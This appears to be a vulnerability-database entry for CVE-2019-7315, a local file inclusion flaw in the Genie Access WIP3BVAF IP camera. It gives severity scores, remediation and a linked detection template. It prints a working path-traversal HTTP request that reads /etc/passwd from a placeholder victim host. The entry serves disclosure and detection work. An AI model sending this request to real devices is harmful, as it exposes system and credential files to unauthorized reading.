🔙 목록으로 돌아가기

CVE-2019-7315: Genie Access WIP3BVAF IP Camera - Local File Inclusion

TitleGenie Access WIP3BVAF IP Camera - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files on the system.
RemediationApply the latest firmware update provided by the vendor to fix the local file inclusion vulnerability.
CVSS Score7.5
EPSS Score0.61225
CVE IDCVE-2019-7315
CWE IDCWE-22
Tags cve cve2019 camera genie lfi iot genieaccess vuln

🔍 Vulnerability Description

Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow.

🌐 HTTP Request

GET /../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-7315.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-7315.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A